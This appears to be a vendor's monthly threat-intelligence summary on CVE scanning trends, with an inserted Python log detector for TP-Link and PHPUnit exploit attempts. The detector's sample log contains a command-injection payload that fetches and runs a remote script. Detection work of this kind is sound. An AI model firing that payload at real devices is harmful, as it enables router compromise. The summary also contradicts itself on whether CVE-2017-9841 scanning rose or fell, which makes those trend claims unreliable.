Continued Intense Scanning From One IP in Lithuania

Plus a few interesting changes in the CVEs we track, and some notes on just what kinds of malware stagers we see.

Welcome to the September 2024 installment of the Sensor Intelligence Series (SIS), our monthly summary of vulnerability intelligence based on distributed passive sensor data.

Below are a few key takeaways from this month’s summary.

  • Scanning for CVE-2017-9841 dropped by 10% (vs. August).
  • CVE-2023-1389 continues to be the most scanned CVE we track, with a 400% increase over August.
  • One IP address continues to be the most observed source, accounting for 43% of all scanning traffic we saw.
  • We see a spike in the scanning of CVE-2023-25157, a Critical vulnerability in the GeoServer software project.

CVE Scanning

Following on from last month’s analysis, scanning for CVE-2017-9841 (the PHPUnit eval-stdin.php RCE) has decreased by 10% compared to August and is down 99.8% from its high-water mark in June of 2024; it has nearly vanished from our visualizations.

CVE-2023-1389, a command-injection RCE vulnerability in TP-Link Archer AX21 routers, has been the most scanned CVE for the last two months, increasing 400% over August. While a swing of this size may seem remarkable, as we have noted before, it is not unusual when we look at the shape of scanning for a particular CVE over time.

Following Up on an Aberration

Last month, a pattern of scanning activity was identified coming from a specific IPv4 address (141.98.11.114), which was suspected to be the BotPoke scanner. Despite a slight decrease in scanning traffic, this IP continued to target the same URIs and regions where our sensors are located, accounting for 43% of the overall scanning traffic observed.

A Brief Note on Malware Stagers Observed

Our passive sensors do not respond to traffic, which limits our ability to observe what an attacker would do after a successful exploit. However, the request payloads themselves often reveal the intended next step: for some CVEs, the exploit attempt carries a command that would download and run a malware stager on the target.

To view an example of the most common URL observed in September attempting to exploit CVE-2023-1389, visit F5 Labs to read the full summary.
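The two passages above (the CVE-2023-1389 surge and the stager note) describe exactly the kind of signal a defender can pull out of ordinary web-server logs. The following is an added example, not F5 Labs code or data: it classifies access-log requests as CVE-2023-1389 or CVE-2017-9841 attempts and extracts any wget/curl stager URL embedded in the injected command. The request shapes (the Archer AX21 `/locale` endpoint with `operation=write` and a `country` value containing shell metacharacters; the PHPUnit `eval-stdin.php` path) come from public descriptions of the two vulnerabilities, and the log lines and IP addresses are constructed for illustration.

```python
"""Flag CVE-2023-1389 and CVE-2017-9841 exploit attempts in web-server access
logs and pull out any malware-stager URL embedded in the payload.

Added example: not F5 Labs code or data. Request shapes follow public
write-ups of the two CVEs; the sample log lines below are constructed.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Combined log format (Apache/nginx). The URI field is captured raw, still
# percent-encoded, so that parse_qs can decode query values correctly.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) \S+" '
    r'(?P<status>\d{3}) \S+'
)

# Shell command-substitution and chaining tokens: a legitimate country code
# never contains these.
CMD_INJECT_RE = re.compile(r'\$\(|`|;|\|\||&&|\|')

# First URL handed to wget or curl inside the injected command.
STAGER_URL_RE = re.compile(r'(?:wget|curl)[^;|&`]*?(https?://[^\s;|&`\'"]+)')


def classify_request(uri: str) -> Tuple[Optional[str], Optional[str]]:
    """Return (cve, stager_url) for a request URI, or (None, None)."""
    parts = urlsplit(uri)
    path = unquote(parts.path)

    # CVE-2017-9841: PHPUnit eval-stdin.php exposed under vendor/ (public
    # write-up). The PHP payload travels in the POST body, so the path alone
    # is the signal an access log gives us.
    if path.endswith('/phpunit/src/Util/PHP/eval-stdin.php'):
        return 'CVE-2017-9841', None

    # CVE-2023-1389: Archer AX21 locale endpoint; with operation=write the
    # 'country' field reaches a shell unsanitized (public write-up).
    if '/cgi-bin/luci/' in path and path.endswith('/locale'):
        qs = parse_qs(parts.query)          # decodes %xx and '+' in values
        country = qs.get('country', [''])[0]
        if qs.get('operation', [''])[0] == 'write' and CMD_INJECT_RE.search(country):
            m = STAGER_URL_RE.search(country)
            return 'CVE-2023-1389', (m.group(1) if m else None)

    return None, None


def scan_log(lines: List[str]) -> List[Tuple[str, str, Optional[str]]]:
    """Return (source_ip, cve, stager_url) for every line that matches a CVE."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                        # not combined log format; skip
        cve, stager = classify_request(m.group('uri'))
        if cve:
            hits.append((m.group('ip'), cve, stager))
    return hits


# Constructed sample log: documentation-range IPs, fabricated timestamps.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Sep/2024:08:14:02 +0000] "GET /cgi-bin/luci/;stok=/locale'
    '?form=country&operation=write&country=$(wget+http://198.51.100.7/x.sh+-O-+|+sh)'
    ' HTTP/1.1" 404 162',
    '203.0.113.5 - - [12/Sep/2024:08:14:03 +0000] "POST /vendor/phpunit/phpunit/src'
    '/Util/PHP/eval-stdin.php HTTP/1.1" 404 162',
    '198.51.100.23 - - [12/Sep/2024:08:15:40 +0000] "GET /cgi-bin/luci/;stok=/locale'
    '?form=country&operation=read HTTP/1.1" 200 315',
    '203.0.113.9 - - [12/Sep/2024:08:16:11 +0000] "GET /cgi-bin/luci/;stok=/locale'
    '?form=country&operation=write&country=$(id) HTTP/1.1" 404 162',
    '192.0.2.44 - - [12/Sep/2024:08:17:05 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

if __name__ == '__main__':
    for ip, cve, stager in scan_log(SAMPLE_LOG):
        print(f'{ip:15} {cve:14} stager={stager}')
```

The benign `operation=read` probe and the write without a URL are kept in the sample deliberately: the first must not fire, and the second shows that an exploit attempt with no fetchable stager is still worth recording, since the sensor only sees the first stage regardless.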

September Vulnerabilities by the Numbers

Figure 1 shows September attack traffic for the top ten CVEs, with CVE-2023-1389 dominating. The increased scanning for this vulnerability throws off the proportions of this view; figure 3, plotted on a logarithmic scale, gives an easier view of the rest.

Figure 2 shows a significant increase in scanning for CVE-2023-1389 over the past year, while a decline in scanning for CVE-2017-9841 persists.

Long-Term Trends

Figure 3 shows the traffic for the top 19 CVEs, with CVE-2017-9841 and CVE-2023-1389 showing significant increases over the period. The average of the other 110 CVEs has fallen dramatically. CVE-2023-25157, a critical vulnerability in the GeoServer software project, has seen a dramatic increase in scanning. The log scale helps show changes in the other top 10 scanned CVEs.

To find out more about September’s CVEs and for recommendations on how to stay ahead of the curve in cybersecurity, check out the full article here.

We’ll see you next month!

Published Dec 05, 2024
Version 1.0